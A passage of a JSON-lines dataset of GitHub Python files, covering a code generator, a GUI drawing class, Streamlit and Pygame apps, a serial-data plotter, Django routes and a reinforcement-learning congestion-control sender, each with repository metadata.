__first_to_upper(name)\r\n model[\"type\"] = type_name\r\n model[\"blueprint_var_name\"] = name.lower()\r\n model[\"blueprint_type\"] = type_name + \"Blueprint\"\r\n model[\"schema_type\"] = type_name + \"Schema\"\r\n\r\n fields = []\r\n has_array = False\r\n needs_numpy = False\r\n\r\n\r\n for attribute in blueprint.all_attributes.values():\r\n field = __create_field(attribute,blueprint.parent,imports,cross_references)\r\n if field:\r\n fields.append(field)\r\n if field[\"is_array\"]:\r\n has_array = True\r\n needs_numpy |= not field[\"is_entity\"]\r\n\r\n model[\"has_self_reference\"] = __refers_to(blueprint, cross_references) or __refers_to(blueprint, imports)\r\n # We should also check that the imports does not point to this as a cross ref.\r\n #Remove any self reference from the imports or cross references\r\n\r\n imports = {name:bp_ref for name, bp_ref in imports.items() if bp_ref != blueprint}\r\n cross_references = {name:bp_ref for name, bp_ref in cross_references.items() if bp_ref != blueprint}\r\n\r\n import_types= set(imports.values())\r\n import_types = import_types.union(super_classes)\r\n\r\n pkg=blueprint.get_parent()\r\n for import_type in imports.values():\r\n if isinstance(import_type, Blueprint):\r\n for attribute in import_type.all_attributes.values():\r\n if not attribute.is_primitive and not attribute.is_enum:\r\n imp_bp = pkg.get_blueprint(attribute.type)\r\n if blueprint == imp_bp:\r\n cross_references[import_type.name] = import_type\r\n import_types.remove(import_type)\r\n\r\n model[\"imports\"] = __to__imports(pkg,import_types)\r\n model[\"has_cross_references\"] = len(cross_references) > 0\r\n model[\"cross_references\"] = __to__import_infos(pkg,cross_references.values())\r\n model[\"has_array\"] = has_array\r\n model[\"needs_numpy\"] = needs_numpy\r\n model[\"fields\"] = fields\r\n model[\"arguments\"]=__create_named_arguments(fields)\r\n return model\r\n\r\ndef __first_to_upper(string):\r\n # Make sure the first letter is uppercase\r\n return string[:1].upper() + string[1:]\r\n\r\ndef __create_field(attribute: BlueprintAttribute, package: Package,imports: OrderedDict,cross_references: OrderedDict):\r\n field = {}\r\n name = __rename_if_reserved(attribute.name)\r\n field[\"name\"] = name\r\n dimension = attribute.get(\"dimensions\",None)\r\n field[\"description\"] = attribute.description\r\n field[\"readonly\"] = False\r\n is_array = dimension is not None\r\n\r\n field[\"is_array\"] = is_array\r\n a_type: str = attribute.get(\"attributeType\")\r\n if a_type not in types:\r\n blueprint = package.get_blueprint(a_type)\r\n if attribute.contained:\r\n imports[a_type]=blueprint\r\n else:\r\n cross_references[a_type]=blueprint\r\n return __create_blueprint_field(field, blueprint, is_array)\r\n\r\n enum_type = attribute.get(\"enumType\",None)\r\n if enum_type:\r\n return __create_enum_field(field,attribute,package,enum_type, imports)\r\n\r\n ftype = __map_type(a_type)\r\n field[\"is_entity\"] = False\r\n field[\"type\"] = ftype\r\n field[\"type_description\"] = ftype\r\n\r\n if is_array:\r\n dims=dimension.split(\",\")\r\n field[\"type\"] = \"ndarray\"\r\n field[\"type_description\"] = \"ndarray of \" + ftype\r\n field[\"ftype\"] = ftype\r\n field[\"init\"] = \"[]\"\r\n field[\"setter\"] = f\"asarray(value, dtype={ftype})\"\r\n field[\"ndim\"] = len(dims)\r\n\r\n else:\r\n field[\"setter\"] = __map(ftype, setters)\r\n field[\"default\"] = __find_default_value(attribute, ftype)\r\n field[\"init\"] = field[\"default\"]\r\n\r\n return field\r\n\r\ndef __rename_if_reserved(name):\r\n if keyword.iskeyword(name):\r\n return name + \"_\"\r\n return name\r\n\r\n\r\n\r\ndef __create_blueprint_field(field, blueprint: Blueprint, is_array) -> Dict:\r\n field[\"is_entity\"] = True\r\n import_package: Package = blueprint.get_parent()\r\n paths=import_package.get_paths()\r\n bp_path = \".\".join(paths) + \".\" + blueprint.name.lower()\r\n field[\"module\"] = bp_path\r\n if is_array:\r\n field[\"type\"] = \"List[\"+blueprint.name+\"]\"\r\n field[\"simple_type\"] = blueprint.name\r\n field[\"init\"] = \"list()\"\r\n field[\"setter\"] = \"[]\"\r\n else:\r\n field[\"type\"] = blueprint.name\r\n field[\"setter\"] = \"value\"\r\n field[\"init\"] = \"None\"\r\n return field\r\n\r\ndef __create_enum_field(field,attribute: BlueprintAttribute, package: Package, enum_type: str, imports) -> Dict:\r\n enum = package.get_enum(enum_type)\r\n imports[enum.name]=enum\r\n field[\"is_entity\"] = False\r\n field[\"type\"] = enum.name\r\n field[\"setter\"] = \"value\"\r\n init=attribute.content.get(\"default\",enum.default)\r\n field[\"init\"] = enum.name + \".\" +init\r\n return field\r\n\r\ndef __map(key, values):\r\n converted = values.get(key)\r\n if not converted:\r\n raise Exception('Unkown type ' + key)\r\n return converted\r\n\r\n\r\ndef __map_type(ptype):\r\n return __map(ptype, types)\r\n\r\n\r\ndef find_default_value(attribute: BlueprintAttribute):\r\n \"\"\"Returns the default value literal\"\"\"\r\n a_type: str = attribute.get(\"attributeType\")\r\n etype = __map_type(a_type)\r\n return __find_default_value(attribute, etype)\r\n\r\ndef __find_default_value(attribute: BlueprintAttribute, etype: str):\r\n default_value = attribute.get(\"default\")\r\n if default_value is not None:\r\n return __convert_default(attribute,default_value)\r\n return default_values[etype]\r\n\r\n\r\ndef __convert_default(attribute: BlueprintAttribute, default_value):\r\n # converts json value to Python value\r\n if isinstance(default_value,str):\r\n if default_value == '' or default_value == '\"\"':\r\n return '\"\"'\r\n elif attribute.type == 'integer':\r\n return int(default_value)\r\n elif attribute.type == 'number':\r\n return float(default_value)\r\n elif attribute.type == 'boolean':\r\n return default_value.lower() == \"true\"\r\n else:\r\n return \"'\" + default_value + \"'\"\r\n return default_value\r\n\r\ndef __to_type_string(string: str) -> str:\r\n return string[:1].upper() + string[1:]\r\n\r\ndef __to__imports(pkg: Package, blueprints: Set[Blueprint]) -> Sequence[str]:\r\n imports = __to__import_infos(pkg, blueprints)\r\n statements = [__to_import_statement(x) for x in imports]\r\n statements.sort()\r\n return statements\r\n\r\ndef __to_import_statement(import_info: Dict) -> str:\r\n module=import_info[\"module\"]\r\n name=import_info[\"name\"]\r\n return f\"from {module} import {name}\"\r\n\r\n\r\ndef __to__import_infos(pkg: Package,blueprints: Set[Blueprint]) -> Sequence[Dict]:\r\n imports = []\r\n for blueprint in blueprints:\r\n bp_path=_to_relative_import_path(pkg,blueprint)\r\n name = blueprint.name\r\n if bp_path.startswith(\"system.SIMOS\"):\r\n bp_path = \"dmt.\"+ name.lower()\r\n bp_name = __to_type_string(name)\r\n import_info = {\r\n \"module\": bp_path,\r\n \"name\": bp_name\r\n }\r\n imports.append(import_info)\r\n\r\n return imports\r\n\r\ndef _to_relative_import_path(pkg: Package, blueprint: Blueprint) -> str:\r\n import_package = blueprint.get_parent()\r\n name = blueprint.name.lower()\r\n if pkg == import_package:\r\n return \".\"+name\r\n current_dir = pkg.package_dir\r\n import_dir = import_package.package_dir\r\n import_module = import_package.package_dir / name\r\n # Get me the relative path from current_dir to import_dir\r\n root_dir = pkg.get_root().package_dir\r\n if import_module.is_relative_to(root_dir) and current_dir.is_relative_to(root_dir):\r\n # Find the relative path from current_dir to import_dir\r\n relative = os.path.relpath(import_dir, current_dir)\r\n ret = \"\".join(Path(relative).parts)\r\n return ret\r\n\r\n paths = import_package.get_paths()\r\n return \".\".join(paths)\r\n\r\ndef __refers_to(blueprint: Blueprint, imports: Dict) -> bool:\r\n return blueprint in imports.values()\r\n\r\ndef __create_named_arguments(fields: Sequence[Dict]) -> str:\r\n args = []\r\n for field in fields:\r\n if not field[\"is_entity\"] and not field[\"is_array\"]:\r\n default_value = field[\"init\"]\r\n if default_value is not None:\r\n name = field[\"name\"]\r\n args.append(name + \"=\"+ str(default_value))\r\n field[\"init\"] = name\r\n\r\n if len(args) == 0:\r\n return \"\"\r\n\r\n return \", \" + \", \".join(args)\r\n\r\ndef __find_super_classes(blueprint: Blueprint) -> Sequence[Blueprint]:\r\n base_classes: OrderedDict = OrderedDict()\r\n for extension in blueprint.extensions:\r\n base_classes[extension.name]=extension\r\n return base_classes.values()\r\n\r\ndef __to__super_classes(bps: Sequence[Blueprint]) -> str:\r\n types = [__to_type_string(bp.name) for bp in bps]\r\n if types:\r\n return \",\".join(types)\r\n return \"Entity\"\r\n","repo_name":"SINTEF/dmt-gen-py","sub_path":"src/dmtpygen/generators/entity_model.py","file_name":"entity_model.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29499667757","text":"from graphEntity import *\r\nfrom ATOM3Constraint import *\r\nfrom GraphicalForm import *\r\n\r\nclass graph_ExternalConnection(graphEntity):\r\n\r\n def __init__(self, x, y, semObject = None):\r\n self.semanticObject = semObject\r\n graphEntity.__init__(self, x, y)\r\n self.graphForms = []\r\n\r\n def DrawObject(self, drawing):\r\n self.dc = drawing\r\n h = drawing.create_line(self.translate([2.0, 3.0, 2.0, 70.0, 106.0, 70.0, 106.0, 13.0, 106.0, 13.0]), tags = self.tag, fill = \"black\")\r\n self.gf0 = GraphicalForm( drawing, h, \"gf0\")\r\n self.graphForms.append(self.gf0)\r\n\r\n h = drawing.create_line(self.translate([2.0, 3.0, 94.0, 3.0, 106.0, 14.0, 88.0, 20.0, 94.0, 3.0]), tags = self.tag, fill = \"black\")\r\n self.gf1 = GraphicalForm( drawing, h, \"gf1\")\r\n self.graphForms.append(self.gf1)\r\n\r\n h = drawing.create_oval(self.translate([15.0, 21.0, 33.0, 43.0]), tags = self.tag, fill = \"\", outline = \"black\")\r\n self.gf2 = GraphicalForm( drawing, h, \"gf2\")\r\n self.graphForms.append(self.gf2)\r\n\r\n h = drawing.create_oval(self.translate([53.0, 36.0, 70.0, 58.0]), tags = self.tag, fill = \"\", outline = \"black\")\r\n self.gf3 = GraphicalForm( drawing, h, \"gf3\")\r\n self.graphForms.append(self.gf3)\r\n\r\n h = drawing.create_oval(self.translate([46.0, 11.0, 62.0, 30.0]), tags = self.tag, fill = \"\", outline = \"black\")\r\n self.gf4 = GraphicalForm( drawing, h, \"gf4\")\r\n self.graphForms.append(self.gf4)\r\n\r\n h = drawing.create_line(self.translate([32.0, 25.0, 46.0, 22.0]), tags = self.tag, fill = \"black\")\r\n self.gf5 = GraphicalForm( drawing, h, \"gf5\")\r\n self.graphForms.append(self.gf5)\r\n\r\n h = drawing.create_line(self.translate([56.0, 29.0, 59.0, 35.0]), tags = self.tag, fill = \"black\")\r\n self.gf6 = GraphicalForm( drawing, h, \"gf6\")\r\n self.graphForms.append(self.gf6)\r\n\r\n h = drawing.create_line(self.translate([32.0, 38.0, 54.0, 44.0]), tags = self.tag, fill = \"black\")\r\n self.gf7 = GraphicalForm( drawing, h, \"gf7\")\r\n self.graphForms.append(self.gf7)\r\n\r\n h = drawing.create_line(self.translate([75.0, 26.0, 98.0, 26.0]), tags = self.tag, fill = \"black\")\r\n self.gf8 = GraphicalForm( drawing, h, \"gf8\")\r\n self.graphForms.append(self.gf8)\r\n\r\n h = drawing.create_line(self.translate([74.0, 34.0, 98.0, 34.0]), tags = self.tag, fill = \"black\")\r\n self.gf9 = GraphicalForm( drawing, h, \"gf9\")\r\n self.graphForms.append(self.gf9)\r\n\r\n h = drawing.create_line(self.translate([74.0, 41.0, 97.0, 41.0]), tags = self.tag, fill = \"black\")\r\n self.gf10 = GraphicalForm( drawing, h, \"gf10\")\r\n self.graphForms.append(self.gf10)\r\n\r\n h = drawing.create_text(self.translate([55.0, 64.0]), tags = self.tag, text = \"Ext. connection\", fill = \"black\")\r\n self.gf11 = GraphicalForm( drawing, h, \"gf11\")\r\n self.graphForms.append(self.gf11)\r\n\r\n h = drawing.create_oval(self.translate([52.0, 72.0, 52.0, 72.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([3.0, 37.0, 3.0, 37.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([51.0, 3.0, 51.0, 3.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([107.0, 40.0, 107.0, 40.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([3.0, 71.0, 3.0, 71.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([3.0, 5.0, 3.0, 5.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([96.0, 5.0, 96.0, 5.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([107.0, 15.0, 107.0, 15.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([107.0, 71.0, 107.0, 71.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n\r\nnew_class = graph_ExternalConnection\r\n","repo_name":"AILab-FOI/LSMASOMM","sub_path":"atom3/Kernel/GraphicalObjects/graph_ExternalConnection.py","file_name":"graph_ExternalConnection.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"33685415275","text":"#import\r\nimport streamlit as st\r\nfrom PIL import Image\r\nfrom predict import predict, filenames\r\n\r\n# uploading image\r\nst.header('Equipment Identification')\r\nst.title(\"Predict New Images\")\r\nuploadedfile = st.file_uploader(\"Choose Image\", type = ['jpg','png','jpeg'])\r\n\r\nif uploadedfile is not None:\r\n # Make prediction\r\n image = Image.open(uploadedfile)\r\n image = image.convert('RGB')\r\n image.save(\"images/tmp_image.jpg\")\r\n prediction, indices = predict(\"images/tmp_image.jpg\")\r\n\r\n # Display uploaded image\r\n st.title(\"Uploaded image\")\r\n st.image(uploadedfile, caption = 'uploaded image',width = 500)\r\n\r\n # Display similar images\r\n st.title(\"Similar images\")\r\n # similar1 = Image.open(\"CAI2\\EDC\\similar.jpg\")\r\n # st.image(similar1 ,width = 500)\r\n # similar2 = Image.open(\"CAI2\\EDC\\similar2.jpg\")\r\n # st.image(similar2 ,width = 500)\r\n for rank, idx in enumerate(indices):\r\n st.image(filenames[idx], caption = f\"similar image: {rank}\", width = 500)\r\n\r\n\r\n # Display description\r\n st.title(\"Description\")\r\n st.text_input(\"Enter some description\")\r\n\r\n # Display predictions\r\n st.title(\"Prediction\")\r\n for i in range(len(prediction)):\r\n st.checkbox(prediction[i])\r\n # Submit button\r\n st.button(\"Submit\")\r\n","repo_name":"Temp9699/CAI2021Group6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17694675474","text":"import pygame\nimport os\n\nWIDTH = 1024\nHEIGHT = 600\nsize = (WIDTH, HEIGHT)\n\nBACKGROUND = pygame.image.load('scarletbox.jpg')\nBACKGROUND = pygame.transform.scale(BACKGROUND, size)\nBACKGROUND_RECT = BACKGROUND.get_rect()\n\n\n# Class for a simple electric car dashboard\nclass Dash(object):\n def __init__(self):\n self.screen = self.initPygame()\n self.screenRect = self.screen.get_rect()\n self.done = False\n\n self.speedSize = 200\n self.voltSize = 100\n self.speedFont = pygame.font.SysFont(\"Ubuntu Medium\", self.speedSize)\n self.voltFont = pygame.font.SysFont(\"Ubuntu Medium\", self.voltSize)\n\n self.fps = 30\n self.clock = pygame.time.Clock()\n self.keys = self.getUserInput()\n\n # Initializes Pygame\n def initPygame(self):\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n pygame.init()\n pygame.display.set_caption('Dashboard Test')\n screen = pygame.display.set_mode(size, pygame.FULLSCREEN)\n return screen\n\n # Checks for exit, returns key presses\n def getUserInput(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n keys = pygame.key.get_pressed()\n return keys\n\n # Updates all text rects\n def updateText(self):\n speed = self.speedFont.render(\"88 mph\", 1, (255, 255, 255))\n speedRect = speed.get_rect()\n speedRect.centerx = WIDTH/2\n speedRect.centery = HEIGHT/3\n self.screen.blit(speed, speedRect)\n \n volt = self.voltFont.render(\"114.6 V\", 1, (255, 255, 255))\n voltRect = speed.get_rect()\n voltRect.centerx = WIDTH/2 + (self.speedSize - self.voltSize)\n voltRect.centery = HEIGHT/4 * 2 + (self.speedSize - self.voltSize)\n self.screen.blit(volt, voltRect)\n\n # Update all Dash components and exit upon ESC press\n def update(self):\n while not self.done and not self.keys[pygame.K_ESCAPE]:\n self.keys = self.getUserInput()\n currentTime = pygame.time.get_ticks()\n self.screen.blit(BACKGROUND, BACKGROUND_RECT)\n \n self.updateText()\n\n pygame.display.update()\n self.clock.tick(60)\n pygame.quit()\n\ndash = Dash()\ndash.update()\n","repo_name":"ianballou/electricdash","sub_path":"textspeedmeter.py","file_name":"textspeedmeter.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3162687369","text":"SD_CARD_PATH = '/sd'\n\nDATA_LOGGER = {\n 'dir': 'sensor_log',\n 'use_sd': True,\n}\n\nLOGGING_FILE = '/logs/log.txt'\n\nFAN = {\n 'turn_on_speed': 90,\n 'turn_off_speed': 80,\n 'min_speed': 85,\n 'starting_speed': 100,\n 'starting_time': 500,\n 'pwm_frequency': 440,\n}\n\nTICK_PERIOD = 50 # milliseconds\nOPERATIONAL_PERIOD = 1000 # milliseconds\n\nOPERATIONAL_FREQUENCY = int(OPERATIONAL_PERIOD/TICK_PERIOD)\n\nTARGET_TEMPERATURE = 90\n\nPINS = {\n 'fan': 12,\n 'fan_led': 13,\n 'test_toggle': 27,\n 'full_throttle_toggle': 26,\n 'tempsensor': 33,\n 'tempsensor_aux': 32,\n 'buzzer': 10,\n}","repo_name":"shushkaden/mp-fan_controller","sub_path":"src/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31412575096","text":"import tkinter as tk\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport matplotlib.animation as animation\nimport serial\nimport threading\nimport queue\n\nclass SerialThread(threading.Thread):\n def __init__(self, queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n s = serial.Serial('COM14', 115200)\n s.reset_input_buffer()\n\n last_value = 0\n while True:\n data = s.readline().decode().strip()\n if data:\n try:\n last_value = float(data)\n self.queue.put(last_value)\n except ValueError:\n # If we cannot convert data to float, put the last valid value instead\n self.queue.put(last_value)\n\n\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.queue = queue.Queue()\n self.fig = Figure(figsize=(5, 5), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.graph = FigureCanvasTkAgg(self.fig, master=self)\n self.graph.get_tk_widget().pack(side=\"top\", fill='both', expand=True)\n\n self.thread = SerialThread(self.queue)\n self.thread.start()\n\n self.data = []\n self.ani = animation.FuncAnimation(self.fig, self.animate, interval=10)\n\n def animate(self, i):\n while self.queue.qsize():\n try:\n data_str = self.queue.get()\n try:\n self.data.append(float(data_str))\n if len(self.data) > 200: # Limit data array length\n self.data.pop(0)\n except ValueError:\n pass # Ignore values that cannot be converted to float\n except queue.Empty:\n pass\n self.ax.clear()\n self.ax.plot(self.data)\n\n\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()\n","repo_name":"lbarretoe/EKmotion","sub_path":"codigoverdad/EKmotion copy.py","file_name":"EKmotion copy.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5622697822","text":"allist=[]\ndatetime=[]\nipadrress=[]\nmsisdn=[]\nplan=[]\npackage=[]\nport=[]\nhttpmethod=[]\nhttpcode=[]\nlogid=[]\nlineno=0\nflag=0\nwith open('apache.log', 'r') as inputfile:\n for line in inputfile: \n for word in line.split(): \n allist.append(word)\n lineno+=1\n \n j=0 \n for i in range(lineno):\n datetime.append(allist[j])\n j+=11\n j=1 \n for i in range(lineno):\n ipadrress.append(allist[j])\n j+=11\n j=3 \n for i in range(lineno):\n msisdn.append(allist[j])\n j+=11 \n j=4 \n for i in range(lineno):\n plan.append(allist[j])\n j+=11\n j=5 \n for i in range(lineno):\n package.append(allist[j])\n j+=11\n j=6 \n for i in range(lineno):\n port.append(allist[j])\n j+=11\n j=7 \n for i in range(lineno):\n httpmethod.append(allist[j])\n j+=11\n j=9 \n for i in range(lineno):\n httpcode.append(allist[j])\n j+=11\n \n j=10\n for i in range(lineno):\n logid.append(allist[j])\n j+=11\nprint(datetime)\nprint(ipadrress)\nprint(msisdn)\nprint(plan)\nprint(package)\nprint(port)\nprint(httpmethod)\nprint(httpcode)\nprint(logid)\n","repo_name":"techsharif/python_training_2021","sub_path":"day4/code_analysis/day3_hw.py","file_name":"day3_hw.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30510852204","text":"from django.urls import path,include\nfrom . import views\nurlpatterns = [\n path('',views.index,name=\"home\"),\n # path('',views.commentPost,name=\"comment\"),\n path('upload',views.upload,name=\"upload\"),\n path('like',views.like_post,name=\"like\"),\n path('profile/',views.profile,name=\"profile\"),\n path('edit/',views.edit,name=\"edit\"),\n path('search',views.search_username,name=\"search\"),\n # path('search-profile',views.search_profile,name=\"search-profle\"),\n path('profile-info',views.profile_info,name=\"profile-info\"),\n path('commentPost/',views.commentPostapi,name=\"commentPost\"),\n # path('comment/',views.comment,name=\"comment\"),\n]\n","repo_name":"luckyklyist/insta-clone","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71788344081","text":"import time\nimport random\nimport math\nimport json\nimport torch\nfrom operator import itemgetter\nfrom typing import List, Dict, Tuple, Optional\nfrom src.strategies import SenderStrategy\nfrom src.ml_helpers import optimize_model, Transition, LSTM_DQN\n\nDEFAULT_TIMEOUT = 2\nBETA_CUBIC = 0.7\nCUBIC_CONSTANT = 4 # This is c from the CUBIC algorithm\n\nclass ReinforcementStrategy(SenderStrategy):\n def __init__(self, policy_net: LSTM_DQN, target_net: LSTM_DQN, device: torch.device, optimizer, hyperparameters: Dict, episode_num: int, transitions: List[Dict]) -> None:\n self.device = device\n self.cwnd = 1\n self.fast_retransmit_packet = None\n self.time_since_retransmit = None\n self.retransmitting_packet = False\n self.ack_count = 0\n self.timeout = DEFAULT_TIMEOUT\n self.fast_retransmitted_packets_in_flight = []\n\n self.duplicated_ack = None\n self.slow_start_thresholds = []\n\n self.next_packet_rewards = {} # Mapping of sequence number to action/state combination\n\n self.sequence_history_dict = {} # list with some fixed size\n self.transitions = transitions\n self.base_rtt = None\n \"\"\"ML initialization\"\"\"\n self.policy_net = policy_net\n self.target_net = target_net\n self.optimizer = optimizer\n self.episode = episode_num\n self.losses = []\n self.hyperparameters = hyperparameters\n self.time_since_last_drop = time.time()\n\n # CUBIC variables\n self.w_max = 42\n super().__init__()\n\n def select_next_action(self, state: torch.tensor):\n sample = random.random()\n eps_threshold = self.hyperparameters['EPS_END'] + (self.hyperparameters['EPS_START'] - self.hyperparameters['EPS_END']) * \\\n math.exp(-1. * self.episode / self.hyperparameters['EPS_DECAY'])\n if sample > eps_threshold:\n with torch.no_grad():\n return self.policy_net(state.unsqueeze(0)).max(1)[1].view(1, 1)\n else:\n return torch.tensor([[random.randrange(len(self.hyperparameters['Actions']))]], device=self.device, dtype=torch.long)\n\n\n def window_is_open(self) -> bool:\n # next_ack is the sequence number of the next acknowledgement\n # we are expecting to receive. If the gap between next_ack and\n # seq_num is greater than the window, then we need to wait for\n # more acknowledgements to come in.\n return self.seq_num - self.next_ack < self.cwnd\n\n def next_packet_to_send(self) -> Optional[str]:\n send_data = None\n in_greater_than_one_retransmit = False\n if self.retransmitting_packet and self.time_of_retransmit and time.time() - self.time_of_retransmit > self.timeout:\n # The retransmit packet timed out--resend it\n self.retransmitting_packet = False\n in_greater_than_one_retransmit = True\n\n if self.fast_retransmit_packet and not self.retransmitting_packet:\n # Logic for resending the packet\n self.unacknowledged_packets[self.fast_retransmit_packet['seq_num']]['send_ts'] = time.time()\n send_data = self.fast_retransmit_packet\n send_data['is_retransmit'] = True\n serialized_data = json.dumps(send_data)\n self.retransmitting_packet = True\n self.time_of_retransmit = time.time()\n\n elif self.window_is_open():\n send_data = {\n 'seq_num': self.seq_num,\n 'send_ts': time.time(),\n 'cwnd': self.cwnd,\n 'is_retransmit': False\n }\n\n self.unacknowledged_packets[self.seq_num] = send_data\n self.seq_num += 1\n elif not self.fast_retransmit_packet:\n # Check to see if any segments have timed out. Note that this\n # isn't how TCP actually works--traditional TCP uses exponential\n # backoff for computing the timeouts\n for seq_num, segment in self.unacknowledged_packets.items():\n if seq_num < self.seq_num and time.time() - segment['send_ts'] > self.timeout:\n segment['send_ts'] = time.time()\n segment['is_retransmit'] = True\n # Update reinforcement learning based on previous window size increase\n self.handle_packet_loss(seq_num, segment)\n return json.dumps(segment)\n\n if send_data is None:\n return None\n else:\n return json.dumps(send_data)\n\n def handle_packet_loss(self, seq_num: int, segment: Dict):\n self.fast_retransmitted_packets_in_flight.append(seq_num)\n self.fast_retransmit_packet = segment\n self.sequence_history_dict[seq_num] = {\n 'cwnd': segment['cwnd'],\n 'rtt': 0,\n 'dropped_packet': True\n }\n current_state = self.compute_state(max(seq_num - self.hyperparameters['STATE_WINDOW_SIZE'], 0), seq_num)\n current_state = self.state_to_tensor(current_state)\n\n current_action = self.select_next_action(current_state)\n self.take_action(current_action)\n self.update_q_function(seq_num, 0, True)\n\n def compute_w_cubic(self, t: float) -> int:\n k = (self.w_max * ((1 - BETA_CUBIC)/CUBIC_CONSTANT)) ** (1/3)\n return 4 * (((t)-k) ** 3) + self.w_max\n\n def process_ack(self, serialized_ack: str) -> None:\n ack = json.loads(serialized_ack)\n if ack.get('handshake'):\n return\n\n self.total_acks += 1\n self.times_of_acknowledgements.append(((time.time() - self.start_time), ack['seq_num']))\n\n if self.unacknowledged_packets.get(ack['seq_num']) is None:\n # Duplicate ack\n #print(\"received dup ack\")\n self.num_duplicate_acks += 1\n if self.duplicated_ack and ack['seq_num'] == self.duplicated_ack['seq_num']:\n self.curr_duplicate_acks += 1\n else:\n self.duplicated_ack = ack\n self.curr_duplicate_acks = 1\n\n if self.curr_duplicate_acks == 3 and (ack['seq_num'] + 1) not in self.fast_retransmitted_packets_in_flight:\n # Received 3 duplicate acks, count this as packet loss\n self.handle_packet_loss(ack['seq_num'] + 1, self.unacknowledged_packets[ack['seq_num'] + 1])\n elif ack['seq_num'] >= self.next_ack:\n if self.fast_retransmit_packet is not None:\n self.fast_retransmit_packet = None\n self.retransmitting_packet = False\n self.curr_duplicate_acks = 0\n self.seq_num = ack['seq_num'] + 1\n\n self.fast_retransmitted_packets_in_flight = []\n\n # Acknowledge all packets where seq_num < ack['seq_num']\n self.unacknowledged_packets = {\n k:v\n for k,v in\n self.unacknowledged_packets.items()\n if k > ack['seq_num']\n }\n self.next_ack = max(self.next_ack, ack['seq_num'] + 1)\n self.seq_num = self.next_ack\n self.ack_count += 1\n self.sent_bytes = ack['ack_bytes']\n rtt = float(time.time() - ack['send_ts'])\n self.rtts.append(rtt)\n self.rtt_recordings.append((time.time(), rtt))\n if self.base_rtt is None:\n self.base_rtt = rtt\n\n self.timeout = rtt * 1.2\n self.sequence_history_dict[ack['seq_num']] = {\n 'cwnd': ack['cwnd'],\n 'rtt': rtt,\n 'dropped_packet': False,\n 'seq_num': ack['seq_num']\n }\n current_state = self.compute_state(max(ack['seq_num'] - self.hyperparameters['STATE_WINDOW_SIZE'], 0), ack['seq_num'])\n current_state = self.state_to_tensor(current_state)\n\n current_action = self.select_next_action(current_state)\n self.take_action(current_action)\n\n # TODO: Move to other function\n if len(self.unacknowledged_packets.keys()) == 0:\n reward_packet = int(self.cwnd) + ack['seq_num']\n else:\n reward_packet = (int(self.cwnd) - len(self.unacknowledged_packets)) + max(self.unacknowledged_packets.keys())\n\n self.next_packet_rewards[reward_packet] = (\n (max(ack['seq_num'] - self.hyperparameters['STATE_WINDOW_SIZE'], 0), ack['seq_num']),\n torch.tensor([int(current_action)], device=self.device, dtype=torch.long)\n )\n self.update_q_function(ack['seq_num'], rtt)\n\n self.cwnds.append((time.time(), self.cwnd))\n\n def state_to_tensor(self, state: List) -> torch.Tensor:\n current_state = [[ elem[feature] for feature in self.hyperparameters['FEATURES'] ] for elem in state ]\n pad = [[0.0] * len(self.hyperparameters['FEATURES']) ] * (self.hyperparameters['STATE_WINDOW_SIZE'] - len(current_state))\n current_state = pad + current_state\n return torch.tensor(current_state, device=self.device)\n\n def take_action(self, action: int):\n if action == self.hyperparameters['Actions']['INCREASE_QUADRATIC']:\n self.cwnd = self.compute_w_cubic(time.time() - self.time_since_last_drop)\n elif action == self.hyperparameters['Actions']['INCREASE_ABSOLUTE']:\n self.cwnd = self.cwnd + self.hyperparameters['ABSOLUTE_CHANGE']/self.cwnd\n elif action == self.hyperparameters['Actions']['DECREASE_PERCENT']:\n self.cwnd = max(self.cwnd * (1 - self.hyperparameters['PERCENT_CHANGE']), 1)\n elif action == self.hyperparameters['Actions']['DECREASE_ABSOLUTE']:\n self.cwnd = max(self.cwnd - self.hyperparameters['ABSOLUTE_CHANGE'], 1)\n elif action == 